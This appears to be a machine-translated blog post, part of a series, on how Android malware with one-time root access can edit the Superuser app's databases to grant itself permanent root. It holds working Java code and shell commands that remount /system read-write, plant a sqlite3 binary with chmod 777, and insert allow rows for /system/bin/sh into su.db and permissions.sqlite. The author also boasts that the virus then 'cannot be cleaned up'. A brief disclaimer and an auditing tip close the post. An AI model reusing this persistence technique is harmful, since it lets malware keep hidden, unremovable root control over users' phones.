This article describes how a virus can tamper with a superuser so that the root permission of a virus request is allowed to be permanently used by the virus.
Continue with the previous two articles. If you have any questions, read the first two articles first.
In other words, your fake.apk must copy the application to the system. This requires the root permission. If the user allows you to copy a root request in front of the user, the system will send a broadcast after the copy, informing you that a new APK is installed, anti-virus software will find you.
Yes, this is indeed a problem, but the virus is a virus, and you will always find a way to make you ill. Don't worry.
Superuser records data to the database. Why does the virus not modify your database? If the modification is successful, it will not be permanently granted the root permission, and you will no longer be needed to approve me. I will approve it myself!
Unfortunately, if the virus gets the root permission once, the above mentioned things can be done completely.
Let's demonstrate that there is a superuser installed on my mobile phone and the version is 3.0.7.
I also installed a re manager.
First, open the re manager. At this time, the Re manager Requests the root permission. The superuser will pop up a prompt asking whether the user permits
Before clicking "allow", select "remember" and then allow.
This step is used to obtain the data that should be inserted in the superuser database when the application obtains permanent root permission.
Then we export the database
/Data/COM. noshufou. Android. Su/databases there are two databases that need attention.
Su. DB
Permissions. SQLite
The following uses permissions. SQLite as an example to describe the table structure:
Then let's see how the virus modifies the data.
Virus only needs to care about several fields
UID, package name, application name, exec_uid = 0, exec_cmd =/system/bin/sh, allow = 1
There is no doubt about how the virus gets its own package name and Application name.
Activitymanager. runningappprocessinfo contains uid Information
The following code obtains the UID of the current application.
public static int getUid(Context context,String packageName){ActivityManager activityManager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);List<ActivityManager.RunningAppProcessInfo> runningAppProcesses = activityManager.getRunningAppProcesses();int size = runningAppProcesses.size();ActivityManager.RunningAppProcessInfo runningAppProcessInfo = null;for (int i = 0; i < size; i++) {runningAppProcessInfo = runningAppProcesses.get(i);if(packageName.equals(runningAppProcessInfo.processName)){return runningAppProcessInfo.uid;}}return -1;}
Well, this table has been done, and Su. DB is almost the same as this, so it will not be demonstrated.
The last question is how to modify the database in the mobile phone. Obviously, we use sqlite3, but some mobile phones do not have this problem, so the virus may be bound by itself, then copy to system/bin or system/xbin.
Where does sqlite3 come from? Yes .. For example, you can generate a copy from the simulator pull.
Okay, all done.
Finally, we will take two steps.
1. Prepare the sqlite3 file, just in case
prepareButton.setOnClickListener(new View.OnClickListener() {public void onClick(View v) {File dataFolder = getFilesDir(); File sqlite = new File(dataFolder.getAbsolutePath() + "/sqlite3"); copyFile("db/sqlite3", sqlite, mResources);}});
2. Apply for the root permission. Once successful, modify the database.
String sqlUpdateSu = "insert into apps (uid,package,name,exec_uid,exec_cmd,allow,dirty)" + "values (\""+ uid + "\",\"" + packageName + "\",\"" + name + "\",0,\"/system/bin/sh\",1,0) "; String sqlInsertPermissions = "insert into apps (uid,package,name,exec_uid,exec_cmd,allow) " + "values (\""+ uid + "\",\"" + packageName + "\",\"" + name + "\",\"0\",\"/system/bin/sh\",\"1\") "; String[] commands = {"busybox mount -o remount,rw /system" ,"ls /system/bin/sqlite3 || ls /system/xbin/sqlite3 || busybox cp /data/data/" + packageName + "/files/sqlite3 /system/xbin/sqlite3 && chmod 777 /system/xbin/sqlite3" ,"busybox rm /data/data/" + packageName + "/files/sqlite3" ,"sqlite3 /data/data/com.noshufou.android.su/databases/su.db '" + sqlUpdateSu + "'" ,"sqlite3 /data/data/com.noshufou.android.su/databases/permissions.sqlite '" + sqlInsertPermissions + "' "};
Run
From now on, the virus is out of your control and cannot be cleaned up.
Conclusion
This blog is only used for demonstration, so it is not strict.
For example, before using superuser for the first time, its database tables may not be created, so some SQL operations may fail.
I don't plan to write a complete virus, so some people will want to do something unclean. Learning and communication only
It seems that every time you approve the root user, you have to go to the superuser list to see if there are any exceptions.
Please do not use the root mobile phone to download software at will, or use any excuse to create any virus!
References:
Security issues after Android mobile Root
(3)"